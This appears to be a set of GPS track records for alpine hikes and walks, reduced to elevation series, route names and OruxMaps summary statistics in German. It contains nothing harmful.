+1141.27 + + + +1158.08 + + + +1126.53 + + + +1100.93 + + + +1099.06 + + + +1071.31 + + + +1033.16 + + + +1004.37 + + + +983.91 + + + +934.62 + + + +916.19 + + + +879.28 + + + +829.08 + + + +821.5 + +" +" + + + + + + +Garmin International + + + +Szruich +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Szruich</h2><br /><p>Startzeit: 10/10/2017 10:40</p><p>Zielzeit: 10/10/2017 11:25</p><p>Strecke: 3km (00:45)</p><p>Bewegungszeit: 00:42</p><p>Ø-Geschwindigkeit: 3,9km/h</p><p>Netto-Geschwindigkeit: 4,3km/h</p><p>Max. Geschwindigkeit: 39km/h</p><p>Minimale Höhe: 88m</p><p>Maximale Höhe: 426m</p><p>Steig-Geschw.: 497,1m/h</p><p>Sink-Geschw.: -318,8m/h</p><p>Aufstieg: 350m</p><p>Abstieg: -18m</p><p>Steigzeit: 00:42</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + + + + + + +89.9 + + + +106.74 + + + +121.76 + + + +126.52 + + + +128.47 + + + +144.02 + + + +149.39 + + + +159.16 + + + +191.62 + + + +193.99 + + + +202.3 + + + +237.73 + + + +244.49 + + + +255.74 + + + +268.9 + + + +292.06 + + + +296.41 + + + +302.99 + + + +321.39 + + + +340.34 + + + +354.11 + + + +354.9 + + + +365.15 + + + +390.15 + + + +390.8 + + + +391.93 + + + +400.88 + + + +409.39 + + + +426.52 + +" +" + + + + + + + +Linie + + + +2306.2 + + +2307.2 + + +2306.1 + + +2329.5 + + +2333.4 + + +2338.6 + + +2349.5 + + +2349.0 + + +2343.8 + + +2342.8 + + +2336.1 + + +2327.0 + + +2326.8 + + +2327.1 + + +2326.4 + + +2325.6 + + +2326.7 + + +2327.3 + + +2326.4 + + +2332.3 + + +2342.4 + + +2350.8 + + +2359.0 + + +2367.7 + + +2392.1 + + +2408.2 + + +2412.6 + + +2435.0 + + +2443.7 + + +2474.0 + + +2502.2 + + +2507.6 + + +2558.7 + + +2564.0 + + +2571.3 + + +2578.7 +" +" + + + + + + + +Move + + + +-1.0 + + + +-0.0299999993294477 +0.600000023841858 +1.324 +-1 +1035 +27.6000003814697 + +-1.0 + + + +0 +1.10000002384186 +2775 +-1 +1035 +22 + + + " +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-06-02 21:16:39 + + + + + + +1143.73 + + + +1151.49 + + + +1163.34 + + + +1175.27 + + + +1185.56 + + + +1216.14 + + + +1229.16 + + + +1264.15 + + + +1310.57 + + + +1344.29 + + + +1371.54 + + + +1399.19 + + + +1411.03 + + + +1437.16 + + + +1470.11 + + + +1494.92 + + + +1549.67 + + + +1600.4 + + + +1627.88 + + + +1638.99 + + + +1649.94 + + + +1667.83 + + + +1689.25 + + + +1708.41 + + + +1737.52 + + + +1758.9 + + + +1765.96 + + + +1791.28 + + + +1810.1 + + + +1794.68 + + + +1771.56 + + + +1780.33 + + + +1805.01 + + + +1813.85 + + + +1824.08 + + + +1825.56 + + + +1861.18 + + + +1882.1 + + + +1913.63 + + + +1948.67 + + + +1967.98 + + + +2015.16 + + + +2038.85 + + + +2025.32 + + + +1970.93 + + + +1944.24 + + + +1901.48 + + + +1839.93 + + + +1805.41 + + + +1772.56 + + + +1706.58 + + + +1656.37 + + + +1639.15 + + + +1628.84 + + + +1601.28 + + + +1546.68 + + + +1489.71 + + + +1427.33 + + + +1398.4 + + + +1361.5 + + + +1332.59 + + + +1265.27 + + + +1214.36 + + + +1200.14 + + + +1186.28 + + + +1173.85 + + + +1162.7 + + + +1150.84 + + + +1140.74 + + + +1136.34 + +" +" + + + + + + + +2018-01-22 S. Pellegrino Zucco + + + +360.100006103516 + + + +362.399993896484 + + + +364.170013427734 + + + +368.380004882812 + + + +379.359985351562 + + + +383.119995117188 + + + +402.230010986328 + + + +410.5 + + + +412.600006103516 + + + +416.920013427734 + + + +421.279998779297 + + + +431.170013427734 + + + +448.429992675781 + + + +473.429992675781 + + + +663.349975585938 + + + +695.799987792969 + + + +743.760009765625 + + + +827.590026855469 + + + +896.320007324219 + + + +958.299987792969 + + + +1014.70001220703 + + + +1036.58996582031 + + + +1061.22998046875 + + + +1115.68005371094 + + + +1127.51000976562 + + + +1156.5400390625 + + + +1163.26000976562 + + + +1231.69995117188 + + + +1208.0400390625 + + + +1182.46997070312 + + + +1146.85998535156 + + + +1124.81994628906 + + + +1105.31005859375 + + + +1098.88000488281 + + + +1013.32000732422 + + + +1007.40002441406 + + + +975.510009765625 + + + +958.780029296875 + + + +930.609985351562 + + + +922.5 + + + +891.909973144531 + + + +847.210021972656 + + + +812.919982910156 + + + +738.650024414062 + + + +723.659973144531 + + + +692.179992675781 + + + +681.450012207031 + + + +676.609985351562 + + + +617.559997558594 + + + +608.539978027344 + + + +572.5 + + + +539.409973144531 + + + +516.719970703125 + + + +500.869995117188 + + + +492.670013427734 + + + +433.850006103516 + + + +410.589996337891 + + + +389.869995117188 + + + +366.950012207031 + + + +358.859985351562 + + + +356.779998779297 + + + +354.600006103516 + + + +356.0 + + + +359.899993896484 + +" +" + + + + + + + +2015-04-26 15:16:12 + + + +938.86 + + +944.15 + + +964.34 + + +997.99 + + +1015.29 + + +1031.15 + + +1037.88 + + +1047.49 + + +1066.72 + + +1090.27 + + +1101.33 + + +1114.79 + + +1144.59 + + +1153.24 + + +1180.64 + + +1208.51 + + +1251.77 + + +1276.29 + + +1305.61 + + +1374.34 + + +1379.63 + + +1390.2 + + +1395.49 + + +1405.1 + + +1411.35 + + +1417.6 + + +1425.29 + + +1430.58 + + +1433.94 + + +1427.21 + + +1420.0 + + +1411.35 + + +1406.55 + + +1396.93 + + +1393.09 + + +1382.51 + + +1380.59 + + +1339.73 + + +1317.62 + + +1288.3 + + +1270.04 + + +1262.35 + + +1244.08 + + +1234.47 + + +1196.98 + + +1172.47 + + +1162.85 + + +1135.45 + + +1121.03 + + +1097.48 + + +1077.78 + + +1070.08 + + +1054.22 + + +1038.84 + + +1024.42 + + +991.26 + + +975.88 + + +965.3 + + +967.7 +" +" + + + + + + + +Djouce1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Bärschwil-Erschwil + + + + + + +Bärschwil-Erschwil + + + +440.6 + + +417.7 + + +444.1 + + +440.0 + + +437.6 + + +441.4 + + +446.2 + + +508.2 + + +556.3 + + +649.4 + + +697.1 + + +624.0 + + +571.1 + + +566.7 + + +538.0 + + +535.9 + + +538.1 + + +561.6 + + +627.4 + + +654.8 + + +689.8 + + +723.4 + + +712.5 + + +694.1 + + +634.0 + + +621.8 + + +596.0 + + +602.2 + + +619.5 + + +582.4 + + +560.9 + + +543.4 + + +533.5 + + +525.5 + + +507.2 + + +481.5 + + +474.8 + + +457.0 + + +453.0 + + +452.1 + + +451.3 + + +449.7 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +turrach + + + + + +OruxMaps + + + +turrach +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: turrach</h2><br /><p>Startzeit: 06/17/2015 18:09</p><p>Zielzeit: 06/17/2015 19:17</p><p>Strecke: 3,6km (01:07)</p><p>Bewegungszeit: 00:52</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 8,3km/h</p><p>Minimale Höhe: 1771m</p><p>Maximale Höhe: 2230m</p><p>Steig-Geschw.: 613,4m/h</p><p>Sink-Geschw.: -660,7m/h</p><p>Aufstieg: 551m</p><p>Abstieg: -95m</p><p>Steigzeit: 00:53</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1773.71 + + + +1774.53 + + + +1783.75 + + + +1776.37 + + + +1783.58 + + + +1785.05 + + + +1776.65 + + + +1798.65 + + + +1811.64 + + + +1838.21 + + + +1836.58 + + + +1837.18 + + + +1853.23 + + + +1863.59 + + + +1860.17 + + + +1877.65 + + + +1886.7 + + + +1907.34 + + + +1909.46 + + + +1912.22 + + + +1924.22 + + + +1947.31 + + + +1949.74 + + + +1948.74 + + + +1952.79 + + + +1968.2 + + + +1987.19 + + + +2020.68 + + + +2040.21 + + + +2105.59 + + + +2128.66 + + + +2140.47 + + + +2174.34 + + + +2207.8 + + + +2167.92 + + + +2203.21 + + + +2211.23 + + + +2216.15 + + + +2225.11 + + + +2223.74 + + + +2230.46 + + + +2223.3 + +" +" + + +Cime de la palu 2132m + + + + + +OruxMaps + + + +Cime de la palu 2132m +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Cime de la palu 2132m</h2><br /><p>Startzeit: 05/04/2016 12:44</p><p>Zielzeit: 05/04/2016 15:31</p><p>Strecke: 4,9km (02:47)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 1,7km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 978m</p><p>Maximale Höhe: 2134m</p><p>Steig-Geschw.: 441,8m/h</p><p>Sink-Geschw.: -709,5m/h</p><p>Aufstieg: 1156m</p><p>Abstieg: -42m</p><p>Steigzeit: 02:37</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1013.19 + + + +1002.02 + + + +991.44 + + + +988.38 + + + +997.59 + + + +1017.69 + + + +1026.06 + + + +1051.94 + + + +1054.62 + + + +1073.69 + + + +1082.18 + + + +1124.07 + + + +1125.25 + + + +1142.16 + + + +1150.12 + + + +1221.72 + + + +1228.67 + + + +1250.17 + + + +1275.19 + + + +1279.44 + + + +1305.48 + + + +1328.16 + + + +1336.99 + + + +1362.01 + + + +1415.58 + + + +1440.22 + + + +1480.6 + + + +1509.65 + + + +1521.57 + + + +1519.69 + + + +1554.66 + + + +1566.45 + + + +1574.22 + + + +1581.18 + + + +1611.15 + + + +1610.57 + + + +1635.85 + + + +1660.57 + + + +1669.19 + + + +1680.59 + + + +1710.19 + + + +1725.65 + + + +1752.56 + + + +1769.19 + + + +1782.69 + + + +1814.51 + + + +1816.09 + + + +1816.72 + + + +1807.84 + + + +1831.19 + + + +1855.18 + + + +1880.69 + + + +1900.69 + + + +1907.76 + + + +1936.65 + + + +1970.69 + + + +1982.19 + + + +1989.69 + + + +2013.5 + + + +2024.19 + + + +2045.65 + + + +2048.04 + + + +2058.92 + + + +2071.24 + + + +2080.18 + + + +2085.42 + + + +2098.18 + + + +2094.15 + + + +2134.53 + +" +" + + + + + + +Garmin International + + +14-OKT-16 14:59:00 + + + + + +730.74 + + + +797.07 + + + +808.13 + + + +821.1 + + + +826.87 + + + +834.56 + + + +839.85 + + + +853.31 + + + +893.68 + + + +902.33 + + + +916.27 + + + +927.81 + + + +933.1 + + + +937.42 + + + +948.0 + + + +962.9 + + + +980.68 + + + +995.1 + + + +1034.52 + + + +1049.9 + + + +1072.01 + + + +1099.4 + + + +1131.61 + + + +1184.96 + + + +1210.92 + + + +1239.76 + + + +1254.66 + + + +1273.88 + + + +1295.03 + + + +1378.19 + + + +1392.13 + + + +1408.47 + + + +1410.39 + + + +1418.56 + + + +1445.96 + + + +1466.63 + + + +1494.99 + + + +1513.73 + + + +1566.12 + + + +1614.67 + + + +1617.07 + + + +1611.31 + + + +1616.11 + + + +1566.61 + + + +1545.94 + + + +1519.02 + + + +1484.89 + + + +1404.62 + + + +1356.08 + + + +1368.57 + + + +1373.38 + + + +1358.48 + + + +1357.52 + + + +1344.06 + + + +1303.2 + + + +1294.55 + + + +1265.71 + + + +1258.5 + + + +1257.54 + + + +1244.08 + + + +1221.97 + + + +1205.63 + + + +1173.91 + + + +1137.86 + + + +1065.76 + + + +1007.12 + + + +981.16 + + + +948.96 + + + +929.73 + + + +912.43 + + + +890.8 + + + +843.21 + + + +801.4 + + + +787.46 + +" +" + + + + + + + + + +Hanging Garden + + + +1212.0 + + + + + +0.000000 + +1189.0 + + + + + +0.871017 + +1188.0 + + + + + +8.125122 + +1186.0 + + + + + +11.247437 + +1184.0 + + + + + +10.677734 + +1181.0 + + + + + +11.248169 + +1182.0 + + + + + +12.739868 + +1181.0 + + + + + +9.931091 + +1178.0 + + + + + +6.092407 + +1182.0 + + + + + +2.189392 + +1186.0 + + + + + +6.234558 + +1188.0 + + + + + +6.772888 + +1188.0 + + + + + +0.437378 + +1188.0 + + + + + +17.132202 + +1187.0 + + + + + +20.404175 + +1188.0 + + + + + +9.276367 + +1188.0 + + + + + +5.035889 + +1187.0 + + + + + +0.893066 + +1186.0 + + + + + +12.055908 + +1188.0 + + + + + +1.578857 + +1188.0 + + + + + +5.109497 + +1187.0 + + + + + +0.977051 + +1187.0 + + + + + +8.934570 + +1185.0 + + + + + +0.518433 + +1185.0 + + + + + +6.839355 + +1186.0 + + + + + +4.180786 + +1184.0 + + + + + +4.473267 + +1183.0 + + + + + +0.817017 + +1180.0 + + + + + +6.083862 + +1184.0 + + + + + +0.158081 + +1179.0 + + + + + +5.976562 + +1174.0 + + + + + +5.142700 + +1174.0 + + + + + +5.802856 + +1178.0 + + + + + +2.593018 + +1175.0 + + + + + +6.190430 + +1177.0 + + + + + +4.172607 + +1172.0 + + + + + +2.365234 + +1174.0 + + + + + +7.125244 + +1173.0 + + + + + +9.980957 + +1175.0 + + + + + +7.265625 + +1174.0 + + + + + +8.170654" +" + + + + + + +Garmin International + + + +Wiedersberger Horn + + + + + + +1774.25048828125 + + + +1863.65283203125 + + + +1878.553466796875 + + + +1883.840576171875 + + + +1910.757568359375 + + + +1933.3486328125 + + + +1949.691162109375 + + + +2008.331298828125 + + + +2029.961181640625 + + + +2069.855712890625 + + + +2102.059814453125 + + + +2118.40234375 + + + +2093.408203125 + + + +2031.8837890625 + + + +2016.02197265625 + + + +2002.082763671875 + + + +1985.740478515625 + + + +1980.93408203125 + + + +1963.1494140625 + + + +1949.21044921875 + + + +1944.403564453125 + + + +1933.829345703125 + + + +1917.967529296875 + + + +1911.23828125 + + + +1898.740966796875 + + + +1868.9404296875 + + + +1858.846435546875 + + + +1826.642333984375 + + + +1820.393798828125 + + + +1803.08984375 + + + +1782.902099609375 + + + +1763.1953125 + + + +1701.190185546875 + + + +1690.135009765625 + + + +1672.3505859375 + + + +1663.21826171875 + + + +1658.411376953125 + + + +1655.046875 + + + +1640.146484375 + + + +1624.765380859375 + + + +1625.245849609375 + + + +1622.362060546875 + + + +1613.229736328125 + + + +1597.367919921875 + + + +1590.638427734375 + + + +1583.4287109375 + + + +1559.876220703125 + + + +1543.05322265625 + + + +1529.114013671875 + + + +1495.94873046875 + + + +1479.12548828125 + + + +1471.915771484375 + + + +1451.247314453125 + + + +1426.253173828125 + + + +1402.70068359375 + + + +1396.932861328125 + + + +1387.80029296875 + + + +1365.20947265625 + + + +1367.612548828125 + +" +" + + +67gb1442 + + + + +67gb1442 on GPSies.com + + +67gb1442 on GPSies.com + + + +3298.0 + + + +3265.0 + + + +3242.0 + + + +3214.0 + + + +3195.0 + + + +3179.0 + + + +3170.0 + + + +3135.0 + + + +3116.0 + + + +3103.0 + + + +3066.0 + + + +3055.0 + + + +3042.0 + + + +3034.0 + + + +3036.0 + + + +3031.0 + + + +3026.0 + + + +3023.0 + + + +3000.0 + + + +2967.0 + + + +2956.0 + + + +2863.0 + + + +2851.0 + + + +2824.0 + + + +2797.0 + + + +2747.0 + + + +2745.0 + + + +2744.0 + + + +2743.0 + + + + +2743.0 + + + +2740.0 + + + +2733.0 + + + +2682.0 + + + +2626.0 + + + +2617.0 + + + +2579.0 + + + +2570.0 + + + +2532.0 + + + +2514.0 + + + +2516.0 + + + +2515.0 + + + +2511.0 + + + +2515.0 + + + +2518.0 + + + +2538.0 + + + +2542.0 + + + +2547.0 + + + +2531.0 + + + +2531.0 + + + +2521.0 + + + +2496.0 + + + +2457.0 + + + +2455.0 + + + +2466.0 + + + +2476.0 + + + +2480.0 + + + +2475.0 + + + +2472.0 + + + +2460.0 + + + +2444.0 + + + +2443.0 + + + +2441.0 + + + +2429.0 + + + +2419.0 + + + +2415.0 + + + +2417.0 + +" +" + + + + + + +Download GPS-Track-Analyse + + + +Lauf Pointe Saire II-Erweitert + + + +0.0 + + + +61.0 + + + +54.0 + + + +55.0 + + + +60.0 + + + +56.0 + + + +55.0 + + + +53.0 + + + +53.0 + + + +58.0 + + + +58.0 + + + +57.0 + + + +61.0 + + + +57.0 + + + +56.0 + + + +59.0 + + + +58.0 + + + +54.0 + + + +62.0 + + + +59.0 + + + +57.0 + + + +55.0 + + + +64.0 + + + +65.0 + + + +61.0 + + + +62.0 + + + +57.0 + + + +55.0 + + + +51.0 + + + +55.0 + + + +53.0 + + + +53.0 + + + +54.0 + + + +49.0 + + + +56.0 + + + +55.0 + + + +55.0 + + + +58.0 + + + +53.0 + + + +0.0 + + + +47.0 + + + +49.0 + + + +54.0 + + + +58.0 + + + +54.0 + + + +51.0 + + + +51.0 + + + +52.0 + + + +51.0 + + + +52.0 + + + +52.0 + + + +54.0 + + + +59.0 + + + +60.0 + + + +55.0 + + + +57.0 + + + +58.0 + + + +58.0 + + + +54.0 + + + +53.0 + + + +56.0 + + + +60.0 + + + +50.0 + + + +48.0 + + + +0.0 + +" +" + + +Rosskopf + + + + + +OruxMaps + + + +Rosskopf +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rosskopf</h2><br /><p>Startzeit: 10/29/2015 12:26</p><p>Zielzeit: 10/29/2015 14:06</p><p>Strecke: 3,4km (01:39)</p><p>Bewegungszeit: 01:06</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,1km/h</p><p>Max. Geschwindigkeit: 7km/h</p><p>Minimale Höhe: 1469m</p><p>Maximale Höhe: 2181m</p><p>Steig-Geschw.: 454m/h</p><p>Sink-Geschw.: -34,3m/h</p><p>Aufstieg: 703m</p><p>Abstieg: -1m</p><p>Steigzeit: 01:32</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1472.25 + + + +1482.25 + + + +1490.79 + + + +1505.37 + + + +1548.84 + + + +1560.23 + + + +1573.74 + + + +1603.24 + + + +1618.74 + + + +1644.75 + + + +1669.77 + + + +1693.82 + + + +1702.78 + + + +1759.87 + + + +1781.12 + + + +1810.89 + + + +1823.71 + + + +1830.21 + + + +1848.24 + + + +1865.74 + + + +1867.74 + + + +1860.37 + + + +1874.1 + + + +1897.06 + + + +1923.28 + + + +1925.77 + + + +1937.74 + + + +1965.25 + + + +1968.24 + + + +1973.55 + + + +2003.22 + + + +2014.37 + + + +2034.88 + + + +2043.66 + + + +2062.74 + + + +2075.74 + + + +2096.36 + + + +2121.21 + + + +2144.25 + + + +2165.75 + + + +2176.28 + + + +2181.44 + +" +" + + + + + + + +Morteratsch + + + +1894.4 + + +1896.5 + + +1899.7 + + +1903.8 + + +1917.3 + + +1919.4 + + +1925.4 + + +1930.9 + + +1947.1 + + +1965.0 + + +2000.6 + + +2010.5 + + +2012.7 + + +2067.8 + + +2125.6 + + +2137.8 + + +2140.2 + + +2140.2 + + +2144.0 + + +2151.0 + + +2152.0 + + +2164.2 + + +2170.1 + + +2173.0 + + +2175.4 + + +2178.9 +" +" + + + + + + + +~GE176C.kmz/Part b + + + +0.0 +Position 1 + + +0.0 +Position 2 + + +0.0 +Position 3 + + +0.0 +Position 4 + + +0.0 +Position 5 + + +0.0 +Position 6 + + +0.0 +Position 8 + + +0.0 +Position 11 + + +0.0 +Position 12 + + +0.0 +Position 14 + + +0.0 +Position 16 + + +0.0 +Position 18 + + +0.0 +Position 20 + + +0.0 +Position 22 + + +0.0 +Position 23 + + +0.0 +Position 24 + + +0.0 +Position 25 + + +0.0 +Position 29 + + +0.0 +Position 31 + + +0.0 +Position 33 + + +0.0 +Position 35 + + +0.0 +Position 38 + + +0.0 +Position 40 + + +0.0 +Position 41 + + +0.0 +Position 43 + + +0.0 +Position 45 + + +0.0 +Position 46 + + +0.0 +Position 47 + + +0.0 +Position 49 + + +0.0 +Position 52 + + +0.0 +Position 56 + + +0.0 +Position 58 + + +0.0 +Position 59 + + +0.0 +Position 60 + + +0.0 +Position 62 + + +0.0 +Position 64 + + +0.0 +Position 65 + + +0.0 +Position 66 + + +0.0 +Position 67 + + +0.0 +Position 68 + + +0.0 +Position 69 + + +0.0 +Position 71 + + +0.0 +Position 72 + + +0.0 +Position 73 + + +0.0 +Position 75 + + +0.0 +Position 77 + + +0.0 +Position 79 + + +0.0 +Position 80 + + +0.0 +Position 81 + + +0.0 +Position 82 + + +0.0 +Position 83 + + +0.0 +Position 85 + + +0.0 +Position 86 + + +0.0 +Position 87 + + +0.0 +Position 89 + + +0.0 +Position 91 + + +0.0 +Position 92 + + +0.0 +Position 96 + + +0.0 +Position 98 + + +0.0 +Position 101 + + +0.0 +Position 102 + + +0.0 +Position 105 +" +" + + + + + + +Garmin International + + +2015-10-25 17:18:09 + + + + + + +1067.92 + + + +1066.71 + + + +1065.83 + + + +1078.64 + + + +1088.55 + + + +1091.08 + + + +1103.13 + + + +1110.63 + + + +1115.5 + + + +1122.59 + + + +1139.28 + + + +1145.2 + + + +1163.17 + + + +1182.02 + + + +1216.89 + + + +1230.84 + + + +1258.9 + + + +1262.44 + + + +1280.25 + + + +1295.86 + + + +1329.66 + + + +1338.25 + + + +1367.65 + + + +1412.2 + + + +1415.4 + + + +1420.56 + + + +1422.67 + + + +1429.0 + + + +1443.84 + + + +1463.55 + + + +1468.18 + + + +1468.62 + + + +1470.33 + + + +1481.91 + + + +1495.26 + + + +1511.92 + + + +1517.93 + + + +1543.71 + + + +1555.08 + + + +1558.09 + + + +1562.7 + + + +1593.36 + + + +1591.32 + + + +1610.58 + + + +1626.96 + + + +1621.26 + + + +1605.2 + + + +1598.98 + + + +1571.77 + + + +1575.65 + + + +1576.0 + + + +1576.84 + + + +1574.61 + + + +1569.4 + + + +1570.63 + + + +1569.4 + + + +1584.79 + + + +1591.0 + + + +1595.8 + + + +1597.2 + + + +1587.97 + + + +1565.69 + + + +1557.37 + + + +1562.72 + + + +1553.97 + + + +1536.98 + + + +1517.44 + +" +" + + + + + + +Garmin International + + +2014-06-08 17:51:53 + + + + + + +670.65 + + + +661.22 + + + +659.58 + + + +660.41 + + + +660.1 + + + +659.27 + + + +650.88 + + + +621.83 + + + +615.67 + + + +615.61 + + + +622.06 + + + +628.17 + + + +652.82 + + + +660.03 + + + +666.31 + + + +670.58 + + + +675.04 + + + +694.77 + + + +708.27 + + + +726.37 + + + +740.15 + + + +752.8 + + + +777.18 + + + +793.25 + + + +811.63 + + + +818.78 + + + +832.28 + + + +871.36 + + + +879.44 + + + +888.68 + + + +908.44 + + + +925.52 + + + +930.76 + + + +954.4 + + + +963.9 + + + +976.72 + + + +986.45 + + + +997.96 + + + +1002.16 + + + +1014.21 + +" +" + + + + + + +Garmin International + + + +Gitschen 1: 03 JUL 2014 13:18 + + + + + + +1239.73 + + + +1240.11 + + + +1240.02 + + + +1240.85 + + + +1245.02 + + + +1275.48 + + + +1282.84 + + + +1286.75 + + + +1303.0 + + + +1330.69 + + + +1342.54 + + + +1370.38 + + + +1380.84 + + + +1388.56 + + + +1426.98 + + + +1436.1 + + + +1475.17 + + + +1490.0 + + + +1511.82 + + + +1571.79 + + + +1626.57 + + + +1638.59 + + + +1662.68 + + + +1707.89 + + + +1720.01 + + + +1758.08 + + + +1778.74 + + + +1845.92 + + + +1896.93 + + + +1928.52 + + + +1939.98 + + + +1974.99 + + + +1984.06 + + + +1989.6 + + + +2002.58 + + + +2015.17 + + + +2029.32 + + + +2049.63 + + + +2053.22 + + + +2048.05 + + + +2042.97 + + + +2047.38 + + + +2048.87 + + + +2065.01 + + + +2097.93 + + + +2112.65 + + + +2128.2 + + + +2157.9 + + + +2159.63 + + + +2159.43 + + + +2164.81 + + + +2184.11 + + + +2243.46 + + + +2268.08 + + + +2300.53 + + + +2321.63 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Gtand Veymont 2341m + + + + + +OruxMaps + + + +Gtand Veymont 2341m +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Gtand Veymont 2341m</h2><br /><p>Startzeit: 09/20/2016 13:52</p><p>Zielzeit: 09/20/2016 16:01</p><p>Strecke: 4,6km (02:09)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,2km/h</p><p>Max. Geschwindigkeit: 6,4km/h</p><p>Minimale Höhe: 1241m</p><p>Maximale Höhe: 2329m</p><p>Steig-Geschw.: 508,2m/h</p><p>Sink-Geschw.: -393,1m/h</p><p>Aufstieg: 1088m</p><p>Abstieg: -5m</p><p>Steigzeit: 02:08</p><p>Sinkzeit: 00:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1241.19 + + + +1254.07 + + + +1277.04 + + + +1310.05 + + + +1351.42 + + + +1390.55 + + + +1464.99 + + + +1470.55 + + + +1490.05 + + + +1507.98 + + + +1533.05 + + + +1550.8 + + + +1571.55 + + + +1612.82 + + + +1621.53 + + + +1631.78 + + + +1667.42 + + + +1686.54 + + + +1691.65 + + + +1709.04 + + + +1722.95 + + + +1738.84 + + + +1768.98 + + + +1808.6 + + + +1803.03 + + + +1833.01 + + + +1846.43 + + + +1855.04 + + + +1851.55 + + + +1876.59 + + + +1905.52 + + + +1895.58 + + + +1908.42 + + + +1929.93 + + + +1931.05 + + + +1936.9 + + + +1958.06 + + + +1975.55 + + + +1996.5 + + + +2002.99 + + + +2083.02 + + + +2097.15 + + + +2105.51 + + + +2158.05 + + + +2165.17 + + + +2178.42 + + + +2218.92 + + + +2230.05 + + + +2266.55 + + + +2329.54 + +" +" + + +bern-belp + + + + + + + + + +540.0 + + +540.5999999999989 + + +542.1000001393312 + + +542.2999988972967 + + +541.9999958392749 + + +539.4999997357381 + + +539.9631505539752 + + +531.7999884263642 + + +521.8541040175029 + + +506.4 + + +503.9 + + +502.20000177504 + + +503.9000007447434 + + +503.4568402926181 + + +503.7 + + +503.71419563743353 + + +503.99999770714237 + + +504.4 + + +504.0948645487043 + + +504.1999988419998 + + +503.8999985069626 + + +504.29999837331434 + + +504.40000039098175 + + +504.5999995241793 + + +504.69999834004574 + + +505.30000266900475 + + +506.09999783025296 + + +504.79173907829244 + + +505.7 + + +507.30000005506326 + + +507.7 + + +507.671274162645 + + +507.8000037100511 + + +508.1000030326491 + + +509.0 + + +509.1999998852821 + + +509.0000028770294 + + +508.8999994279452 + + +509.49999222253916 + + +509.4999995674706 + + +509.4 + + +510.4 + + +510.06565411045005 + + +508.57121503482136 + + +509.5000011449187 + + +509.7 + + +509.66129555359 + + +510.80000475112126 + + +512.4 + + +511.19999402949054 + + +512.4000150168436 + + +512.9 + + +512.4000150169289 + + +509.9 + + +510.7000032824595 + + +510.99999963292146 + + +510.4999999664209 + + +510.2 + + +510.39999938573914 + + +510.30000028694644 + + +510.59999808544046 + + +509.97306887694793 + + +511.1000016650007 + + +511.3 + + +511.0 + + +510.5000000000002 + + +510.40000000000003 +" +" + + + + + + + + + + +580.599975585938 + + + +580.200012207031 + + + +580.200012207031 + + + +580.599975585938 + + + +594.599975585938 + + + +610.400024414062 + + + +611.799987792969 + + + +652.400024414062 + + + +665.200012207031 + + + +669.799987792969 + + + +681.599975585938 + + + +693.400024414062 + + + +695.0 + + + +706.0 + + + +714.599975585938 + + + +723.200012207031 + + + +731.599975585938 + + + +742.400024414062 + + + +749.799987792969 + + + +765.599975585938 + + + +775.200012207031 + + + +780.400024414062 + + + +794.799987792969 + + + +803.200012207031 + + + +811.799987792969 + + + +844.400024414062 + + + +846.799987792969 + + + +856.799987792969 + + + +857.599975585938 + + + +865.0 + + + +869.200012207031 + + + +871.200012207031 + + + +884.0 + + + +886.799987792969 + + + +891.799987792969 + + + +899.200012207031 + + + +901.200012207031 + + + +909.0 + + + +920.599975585938 + + + +925.200012207031 + + + +932.0 + + + +938.400024414062 + + + +948.799987792969 + + + +963.400024414062 + + + +969.599975585938 + + + +974.0 + + + +978.400024414062 + + + +1031.19995117188 + + + +1177.0 + + + +1181.59997558594 + + + +1192.19995117188 + + + +1209.80004882812 + + + +1222.80004882812 + + + +1223.80004882812 + + + +1251.80004882812 + + + +1286.0 + + + +1318.59997558594 + + + +1345.40002441406 + + + +1389.19995117188 + + + +1404.19995117188 + + + +1413.0 + + + +1423.59997558594 + +" +" + + + + + + + +Bernina Ospizio - Alp Grüm + + + +2255.39 + + +2254.91 + + +2264.04 + + +2264.52 + + +2262.12 + + +2263.56 + + +2265.48 + + +2258.75 + + +2243.85 + + +2239.05 + + +2237.61 + + +2237.61 + + +2239.53 + + +2241.93 + + +2240.01 + + +2236.64 + + +2237.13 + + +2237.61 + + +2238.09 + + +2237.61 + + +2237.13 + + 